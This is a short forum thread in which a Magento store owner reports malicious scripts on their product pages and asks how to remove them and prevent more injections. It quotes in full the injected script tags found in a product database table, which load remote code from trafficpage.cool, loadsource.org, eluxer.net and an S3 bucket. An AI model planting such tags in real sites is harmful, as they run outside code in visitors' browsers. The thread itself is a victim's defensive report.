When I load any of my products' page the below sites, like eluxer.net, loadsource.org, s3.amazonaws.com and trafficpage.cool are being called and they are clearly malwares. How can I remove them?
I had some security flaws that were fixed, but still didn't identify the origin of this attack.
Solved! Go to Solution.
Hello @mathro,
You get more detail about ownership of directory in production mode here https://devdocs.magento.com/guides/v2.0/config-guide/prod/prod_file-sys-perms.html
--
If you've found one of my answers useful, please give Kudos or Accept as Solution
I identified that all the registers on catalog_product_entity_text table had this script injected:
<script src=\"//s3.amazonaws.com/js-static/1cdd8fd283222f8300.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/optout/set/lat?jsonp=__twb_cb_699089770&key=1cdd8fd283222f8300&cv=1533297485&t=1533297485170\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/optout/set/lt?jsonp=__twb_cb_795376469&key=1cdd8fd283222f8300&cv=1678&t=1533297485174\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/addons/lnkr5.min.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51469x7389x&r=1533297485200\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://trafficpage.cool/addons/lnkr30_nt.min.js\" type=\"text/javascript\" xml=\"space\"></script>\r\n<script src=\"http://eluxer.net/code?id=105&subid=51469_7389_\" type=\"text/javascript\" xml=\"space\"></script>
I confess that I failed to keep all my directories safe, giving them stricter permissions and this could potentially be the reason of this injection. Could anyone confirm, give any clues?
How can I avoid future javascript injections?
Hello @mathro,
You get more detail about ownership of directory in production mode here https://devdocs.magento.com/guides/v2.0/config-guide/prod/prod_file-sys-perms.html
--
If you've found one of my answers useful, please give Kudos or Accept as Solution